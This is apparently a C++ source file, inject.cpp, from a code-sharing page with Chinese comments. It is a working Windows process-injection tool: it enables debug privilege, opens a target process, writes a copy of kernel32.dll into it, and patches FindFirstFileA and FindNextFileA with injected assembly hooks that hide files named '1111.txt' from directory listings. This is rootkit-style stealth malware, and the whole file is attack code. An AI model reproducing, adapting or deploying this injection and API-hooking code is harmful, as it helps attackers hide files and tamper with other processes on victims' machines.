📄 inject.cpp
字号:
#include <winsock2.h>
#include <stdio.h>
#include <tlhelp32.h>
#include <windows.h>
#include <malloc.h>
#include <stdio.h>
#include <Psapi.h>
#include <winsock2.h>
#include <Tlhelp32.h>
#pragma comment(lib,"ws2_32")
#pragma comment(lib,"user32")
#pragma comment(lib,"psapi")
#include <winbase.h>
typedef struct
{
HMODULE hModule;//句柄
LPVOID lpNewBaseOfDll;//备份dll句柄
MODULEINFO modinfo;//MODULEINFO结构
}DLLINFO, *PDLLINFO;
#pragma comment (lib,"Advapi32.lib")
BOOL InitDll(char *pszDll, PDLLINFO pDllInfo,HANDLE prochandle)
{
pDllInfo->hModule = GetModuleHandle(pszDll);//得到目标dll句柄,因为是本地信息,所以要保证本程序加载此dll
if(!pDllInfo->hModule)
{
printf("pDllInfo->hModule is null! in InitDll");
return 0;
}
if(!GetModuleInformation(GetCurrentProcess(), pDllInfo->hModule, &pDllInfo->modinfo, sizeof(MODULEINFO)))//得到目标dll信息
{
printf("Error:GetModuleInformation in InitDll");
return 0;
}
pDllInfo->lpNewBaseOfDll = VirtualAllocEx(prochandle,0,pDllInfo->modinfo.SizeOfImage,MEM_COMMIT|MEM_RESERVE,PAGE_EXECUTE_READWRITE);//申请空间并赋予相应权限(执行,读写)
if(!pDllInfo->lpNewBaseOfDll)
{
printf("Error:VirtualAllocEx in InitDll");//错误处理
return 0;
}
BYTE * buffer=(BYTE *)malloc(pDllInfo->modinfo.SizeOfImage);//分配缓冲,容纳目标dll
ReadProcessMemory(prochandle,pDllInfo->modinfo.lpBaseOfDll,buffer,pDllInfo->modinfo.SizeOfImage,0);//读出,远程dll内容
WriteProcessMemory(prochandle,pDllInfo->lpNewBaseOfDll,buffer,pDllInfo->modinfo.SizeOfImage,0);//写入备份dll
return 1;
}
BOOL __stdcall hook_FindNextFileA(HANDLE find,PWIN32_FIND_DATA data)
{
//__asm NOP//如果没有使用得到kernel32.dll地址的语句,就要取消这句的注释,因为没有使用得到kernel32.dll地址的语句,函数初始化代码就少了一句:push esi,为了保证oldproc可以被改写,要增加一字节。
int oldproc=0x11223344;
int Getproc=0x11111111;
int keraddr;
int findnext;
int Geterror;
bool myret;
__asm
{
mov eax,fs:0x30
mov eax,[eax+0x0c]
mov esi,[eax+0x1c]
lodsd
mov eax,[eax + 0x08]
mov keraddr,eax//得到kernel32.dll地址
}
__asm
{
push 0x00000000
push 0x726f7272
push 0x45747361
push 0x4c746547//在堆 中构造"GetLastError"
push esp
push keraddr
call Getproc
mov Geterror,eax//得到GetLastError地址
}
int temp;
__asm
{
push data
push find
mov eax,oldproc
call eax
mov temp,eax
}
char * myname=data->cFileName;
__asm
{
first:
mov eax,myname
mov ebx,0x31313131
cmp [eax],ebx
jne myno
mov eax,myname
mov ebx,0x7478742e
cmp [eax+4],ebx
jne myno//比较是否是"1111.txt"
push data
push myret
mov ebx,findnext
call ebx//如果是则调用findnextfile查找下一个文件
mov temp,eax
mov ebx,ERROR_NO_MORE_FILES
call Geterror
cmp eax,ebx
jne first//如果文件枚举完毕则返回,否则继续比较
myno:
NOP
}
myret=(bool)temp;
return myret;
}
HANDLE __stdcall hook_FindFirstFileA(LPCTSTR find,LPWIN32_FIND_DATA data)
{
int oldproc=0x11223344;//原api地址
int Getproc=0xffbbaadd;//GetProcAddress地址
int keraddr;
int findnext;
int Geterror;
__asm
{
mov eax,fs:0x30
mov eax,[eax+0x0c]
mov esi,[eax+0x1c]
lodsd
mov eax,[eax + 0x08]
mov keraddr,eax//得到kernel32.dll地址
}
__asm
{
push 0x00000041
push 0x656c6946
push 0x7478654e
push 0x646e6946//在堆 中构造"FindNextFileA"
push esp
push keraddr
call Getproc
mov findnext,eax//得到FindNextFileA地址
push 0x00000000
push 0x726f7272
push 0x45747361
push 0x4c746547//在堆 中构造"GetLastError"
push esp
push keraddr
call Getproc
mov Geterror,eax//得到GetLastError地址
}
HANDLE myret;
__asm
{
push data
push find
mov edx,oldproc
call edx//调用原函数
mov myret,eax
}
char * myname=data->cFileName;//指向找到的文件名
__asm
{
first:
mov eax,myname
mov ebx,0x31313131
cmp [eax],ebx
jne myno
mov eax,myname
mov ebx,0x7478742e
cmp [eax+4],ebx
jne myno//比较是否是"1111.txt"
push data
push myret
mov ebx,findnext
call ebx//如果是则调用findnextfile查找下一个文件
mov ebx,ERROR_NO_MORE_FILES
call Geterror
cmp eax,ebx
jne first//如果文件枚举完毕则返回,否则继续比较
myno:
NOP
}
return myret;
}
int hook_api(PDLLINFO pDllInfo, char *name, DWORD hackfunc, DWORD *pNewFunc,HANDLE prochandle)
{
DWORD dw, dwOrigFunc;
MEMORY_BASIC_INFORMATION mbi;
dwOrigFunc = (DWORD)GetProcAddress(pDllInfo->hModule, name);//目标api地址,每个进程的api地址都是一样的,只要找本进程的就可以了。
if(dwOrigFunc == NULL)
{
printf("Error:GetProcAddress in hook_api");//错误处理
return 0;
}
if(!VirtualQueryEx(prochandle,(void *)dwOrigFunc,&mbi,sizeof(MEMORY_BASIC_INFORMATION)))//获取api所在内存信息
{
printf("Error:VirtualQueryEx in hook_api");
return 0;
}
if(!VirtualProtectEx(prochandle,mbi.BaseAddress,mbi.RegionSize,PAGE_EXECUTE_READWRITE,&dw))//分配写和执行权限
{
printf("Error:VirtualProtectEx in hook_api");
return 0;
}
LPVOID funcaddr=VirtualAllocEx(prochandle,0,500,MEM_COMMIT|MEM_RESERVE,PAGE_EXECUTE_READWRITE);//分配内存,写入hook函数
WriteProcessMemory(prochandle,funcaddr,(void *)hackfunc/*func*/,500,0);
//计算原函数COPY的位置
*pNewFunc = dwOrigFunc - (DWORD)pDllInfo->modinfo.lpBaseOfDll + (DWORD)pDllInfo->lpNewBaseOfDll;
//修改原函数入口处内容
BYTE b8=0xb8;//mov eax,XX XX XX XX
WriteProcessMemory(prochandle,(LPVOID)dwOrigFunc,&b8,1,0);
WriteProcessMemory(prochandle,(LPVOID)(dwOrigFunc+1),&funcaddr,4,0);
BYTE e0ff[2]={0xFF,0xE0};//jmp eax
WriteProcessMemory(prochandle,(LPVOID)(dwOrigFunc+5),&e0ff,2,0);
DWORD temp=*pNewFunc;
WriteProcessMemory(prochandle,(LPVOID)((DWORD)funcaddr+11),&temp,4,0);//写入备份api地址
temp=(DWORD)GetProcAddress(GetModuleHandle("kernel32.dll"),"GetProcAddress");
WriteProcessMemory(prochandle,(LPVOID)((DWORD)funcaddr+18),&temp,4,0);//写入GetProcAddress
printf("func:%x,old:%x,new:%x\n",funcaddr,dwOrigFunc,*pNewFunc);//调试信息
return 1;
}
void UpToDebug()//调整令牌提升至debug权限
{
HANDLE token;
OpenProcessToken(GetCurrentProcess(),TOKEN_ADJUST_PRIVILEGES,&token);
TOKEN_PRIVILEGES tp;
tp.PrivilegeCount =1;
LookupPrivilegeValue(NULL,SE_DEBUG_NAME,&tp.Privileges[0].Luid);
tp.Privileges[0].Attributes=SE_PRIVILEGE_ENABLED;
AdjustTokenPrivileges(token,0,&tp,sizeof(tp),0,0);
}
void main(int argc, char **argv)
{
UpToDebug();//提升至debug权限
HANDLE inhandle=OpenProcess(PROCESS_ALL_ACCESS,1,(DWORD)atoi(argv[1]));//打开目标进程
DLLINFO user32_dll;
if(!InitDll("kernel32.dll",&user32_dll,inhandle)) return;//备份目标dll
DWORD new_FindFirstFileA;
hook_api(&user32_dll, "FindFirstFileA", (DWORD)hook_FindFirstFileA, &new_FindFirstFileA,inhandle);//hook函数
hook_api(&user32_dll, "FindNextFileA", (DWORD)hook_FindNextFileA, &new_FindFirstFileA,inhandle);
return;
}
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -